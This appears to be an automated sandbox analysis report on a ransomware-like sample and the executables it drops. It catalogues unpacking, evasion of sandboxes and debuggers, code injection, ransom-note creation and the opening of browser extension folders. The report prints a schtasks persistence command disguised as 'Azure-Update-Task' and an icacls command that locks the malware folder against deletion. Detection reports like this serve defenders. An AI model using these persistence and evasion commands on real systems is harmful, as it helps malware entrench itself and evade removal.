Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2098127230.0000000003196000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: UXNob1Dp32.exe, 00000005.00000003.2098127230.0000000003196000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\; source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\1 source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Ro source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ows\ source: UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Users source: UXNob1Dp32.exe, 00000005.00000003.2193278581.0000000003488000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193874690.0000000003491000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194897418.0000000003498000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Unpacked PE file: 1.2.UXNob1Dp32.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 6.2.UXNob1Dp32.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Unpacked PE file: 9.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 12.2.UXNob1Dp32.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Unpacked PE file: 14.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 24.2.UXNob1Dp32.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 27.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 30.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 32.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Unpacked PE file: 1.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 6.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Unpacked PE file: 9.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 12.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Unpacked PE file: 14.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 24.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 27.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 30.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 32.2.mstsca.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

1_2_00412220

PE file contains sections with non-standard names

Source: build3[1].exe.5.dr	Static PE information: section name: .kic
Source: sqln[1].dll.9.dr	Static PE information: section name: .00cfg
Source: mstsca.exe.14.dr	Static PE information: section name: .kic

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_004052B5 push ecx; ret	0_2_004052C8
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_042670AF push ecx; retf	0_2_042670B2
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E58F05 push ecx; ret	0_2_05E58F18
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00428565 push ecx; ret	1_2_00428578
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_044210AF push ecx; retf	3_2_044210B2
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E78F05 push ecx; ret	3_2_05E78F18
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_0457A0AF push ecx; retf	4_2_0457A0B2
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DE8F05 push ecx; ret	4_2_05DE8F18

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	System file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html			Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	System file written: C:\Users\user\AppData\Local\Temp\chrome.exe			Jump to behavior

Drops PE files

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wctF86A.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Temp\wctF86A.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wct3D66.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Temp\wct3D66.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	File created: C:\Users\user\_README.txt

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

0_2_00404F7E

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Uses cacls to modify the permissions of files

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: build2.exe, 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp

Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_0426571C rdtsc

0_2_0426571C

Contains functionality to query network adapater information

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,

1_2_0040E670

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Thread delayed: delay time: 700000

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Window / User API: threadDelayed 930
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Window / User API: threadDelayed 9069

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wctF86A.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctF86A.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wct3D66.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct3D66.tmp	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\UXNob1Dp32.exe TID: 7312	Thread sleep time: -700000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 7984	Thread sleep count: 930 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 7984	Thread sleep time: -209250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 7984	Thread sleep count: 9069 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 7984	Thread sleep time: -2040525s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_00410160
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_0040F730
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	1_2_0040FB98

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: UXNob1Dp32.exe, 00000001.00000003.1641969430.0000000000753000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1650388933.0000000000753000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000003.1643163181.0000000000753000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000608000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: UXNob1Dp32.exe, 00000005.00000003.1735594551.00000000097F2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: UXNob1Dp32.exe, 00000005.00000003.1739145861.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 10/03/2023 13:09:52.535OFFICECL (0x2394)0x12d8Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 11, "Time": "2023-10-03T12:09:52Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: UXNob1Dp32.exe, 00000006.00000002.4081262958.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: UXNob1Dp32.exe, 00000005.00000003.1735594551.00000000097F2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: UXNob1Dp32.exe, 00000001.00000003.1641969430.0000000000753000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1650388933.0000000000753000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1650388933.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000003.1643163181.0000000000753000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000696000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.0000000000744000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000928000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: build2.exe, 00000009.00000002.1935491088.0000000000928000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: UXNob1Dp32.exe, 00000001.00000002.1650388933.0000000000738000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_0426571C rdtsc

0_2_0426571C

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_0040909D IsDebuggerPresent,

0_2_0040909D

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

1_2_0042A57A

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

1_2_00412220

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_042640A3 push dword ptr fs:[00000030h]	0_2_042640A3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E30042 push dword ptr fs:[00000030h]	0_2_05E30042
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_0441E0A3 push dword ptr fs:[00000030h]	3_2_0441E0A3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E50042 push dword ptr fs:[00000030h]	3_2_05E50042
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_045770A3 push dword ptr fs:[00000030h]	4_2_045770A3
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC0042 push dword ptr fs:[00000030h]	4_2_05DC0042

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_00408568 GetProcessHeap,

0_2_00408568

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_00409028 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409028
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004329EC
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004329BB SetUnhandledExceptionFilter,	1_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

0_2_05E30110

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Memory written: C:\Users\user\Desktop\UXNob1Dp32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Memory written: C:\Users\user\Desktop\UXNob1Dp32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Memory written: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Memory written: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Memory written: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Memory written: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Memory written: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

1_2_00419F90

Creates a process in suspended mode (likely to inject code)

